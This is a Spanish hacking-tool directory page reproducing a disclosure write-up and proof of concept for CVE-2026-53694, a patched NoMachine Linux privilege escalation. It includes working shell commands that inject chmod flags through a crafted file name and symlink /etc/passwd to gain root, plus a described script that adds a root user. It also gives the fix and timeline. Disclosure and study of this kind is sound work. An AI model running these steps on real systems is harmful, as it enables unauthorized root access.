Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-53694-NoMachine-LPE — Exploit de prueba de concepto y documentación para CVE-2026-53694, una escalada de privilegios local en NoMachine para Linux mediante inyección de argumentos en nxchmod.sh, permitiendo acceso root a través de manipulación de enlaces simbólicos. | Kitploit
Herramientas/GitHubGitHub/do4choo/cve-2026-53694-nomachine-lpe
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónExplotación de Binarios
GitHubdo4choo/cve-2026-53694-nomachine-lpe

CVE-2026-53694-NoMachine-LPE

Exploit de prueba de concepto y documentación para CVE-2026-53694, una escalada de privilegios local en NoMachine para Linux mediante inyección de argumentos en nxchmod.sh, permitiendo acceso root a través de manipulación de enlaces simbólicos.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
2hace 3 mesesAún no revisado

CVE-2026-53694: Escalada de Privilegios Local en NoMachine mediante Inyección de Argumentos

CVE Status Target Language

Resumen

Este repositorio contiene el informe y la Prueba de Concepto (PoC) para CVE-2026-53694, una vulnerabilidad de Escalada de Privilegios Local (LPE) en NoMachine para Linux.

Debido a una neutralización incorrecta de los delimitadores de argumentos en el script nxchmod.sh, un usuario local sin privilegios puede inyectar argumentos en un comando del sistema ejecutado como root. Combinando esta inyección de argumentos con un enlace simbólico, un atacante puede sobrescribir archivos críticos del sistema (como /etc/passwd) y escalar sus privilegios a root.

Esta vulnerabilidad ha sido completamente corregida por el proveedor.

El Proceso de Descubrimiento

Encontrar esta vulnerabilidad fue un proceso de prueba, error y una revelación nocturna. Así es como se desarrolló el descubrimiento:

  1. Observando el objetivo: Noté que el script /usr/NX/scripts/restricted/nxchmod.sh era ejecutado periódicamente por el usuario root para gestionar permisos en directorios específicos.
  2. Idea inicial (el callejón sin salida): Vi que el script estaba aplicando chmod a+rw a archivos. Pensé: Si controlo el destino, ¿puedo usar un enlace simbólico para hacer /etc/passwd modificable? Probé un enlace simbólico estándar (ln -s /etc/passwd /tmp/asdf), pero falló. El sticky bit de Linux en directorios como /tmp evita que el usuario root siga ciegamente un enlace simbólico creado por otro usuario.
  3. El avance: Al revisar posteriormente la ejecución del script, noté cómo se construía el comando: ${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}. El script tomaba el nombre de archivo literal y lo pasaba directamente a chmod.
  4. Inyección de comandos mediante el nombre de archivo: Me di cuenta de que podía crear un archivo con espacios y banderas en su nombre. Creé un archivo llamado X1234 -R -L. Cuando el script se ejecutó, el comando chmod expandió esto como argumentos en lugar de una única ruta de archivo.
  5. Evadiendo el sticky bit: Al inyectar las banderas -L (seguir enlaces simbólicos) y -R (recursivo) en el comando chmod a través del nombre de archivo, obligué al propio binario chmod a resolver y seguir el enlace simbólico que creé en el directorio, evitando completamente la protección del sticky bit.
  6. Logrando la LPE: Una vez que /etc/passwd se volvió modificable (a+rw), simplemente pude añadir un nuevo usuario root al archivo y hacer su a él.

Análisis Técnico

La vulnerabilidad surge de cómo NoMachine maneja los permisos para los sockets de X11/Wayland. El script nxchmod.sh es generado por el demonio nxserver.bin ejecutándose como root.

La ejecución vulnerable tiene este aspecto:

# /usr/NX/scripts/restricted/nxchmod.sh
${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}

Si un atacante crea una estructura de directorios y un archivo llamado X1234 -R -L, el comando resultante ejecutado por root se convierte en: /bin/chmod a+rw /tmp/.X11-unix/X1234 -R -L

Cuando se coloca un enlace simbólico que apunta a /etc/passwd dentro del directorio X1234, los argumentos inyectados -R y -L obligan a chmod a seguir recursivamente el enlace simbólico y otorgar permisos globales de lectura/escritura al archivo objetivo.

Requisitos para la Explotación

Para que este exploit funcione, el sistema objetivo debe cumplir las siguientes condiciones:

  • El sistema operativo debe usar Wayland (no X11).
  • Xwayland debe estar activo.
  • Debe haber una sesión gráfica en ejecución (la pantalla de inicio de sesión es suficiente).

Prueba de Concepto

Puede reproducir esta vulnerabilidad manualmente usando comandos de shell o automáticamente con el script Python proporcionado.

Método 1: Ejecución Manual (Shell)

Navegue a /tmp/.X11-unix/ y ejecute los siguientes comandos para crear la estructura de directorios maliciosa.

cd /tmp/.X11-unix/

# 1. Configuración de la explotación
touch "X1234 -R -L"
mkdir X1234
ln -s /etc/passwd /tmp/.X11-unix/X1234/pwn

# Espere a que se ejecute nxchmod.sh (puede tardar hasta 60 segundos).
# Verifique que los permisos de /etc/passwd hayan cambiado a -rw-rw-rw-
# Ahora puede editar /etc/passwd para añadir un usuario root.

Una vez que haya verificado la vulnerabilidad y escalado privilegios, ejecute los siguientes comandos de limpieza para restaurar la estabilidad del sistema y eliminar artefactos:

# 2. Limpieza
rm "X1234 -R -L"
unlink X1234/pwn
rmdir X1234
chmod 644 /etc/passwd

Método 2: Exploit Automatizado

Se proporciona un exploit automatizado completo en poc.py. Este script verifica los requisitos de Wayland, configura el enlace simbólico, espera el ciclo de ejecución de nxchmod.sh e inyecta un nuevo usuario root (gg) en /etc/passwd.

Para ejecutar el exploit:

python3 poc.py

Corrección

Esta vulnerabilidad ha sido solucionada por NoMachine. Los usuarios deben actualizar a las siguientes versiones o posteriores:

  • NoMachine 9.5.7
  • NoMachine 8.23.2

Cronología

  • 2026-04-20: Vulnerabilidad reportada al proveedor.
  • 2026-04-23: El proveedor confirmó la vulnerabilidad y acordó una divulgación coordinada.
  • 2026-05-07: El proveedor publicó versiones corregidas (9.5.7 y 8.23.2) y publicó el Informe de Problema TR04X11802.
  • 2026-06-10: CVE-2026-53694 publicado en NVD. (El registro oficial de MITRE está actualmente pendiente de análisis completo y actualizaciones de créditos (última verificación 2026-07-01))

Referencias

  • Informe de Problema de NoMachine TR04X11802
  • Actualización de Software de NoMachine SU05X00274
  • Actualización de Software de NoMachine SU05X00275
  • NVD - CVE-2026-53694
Descargar herramienta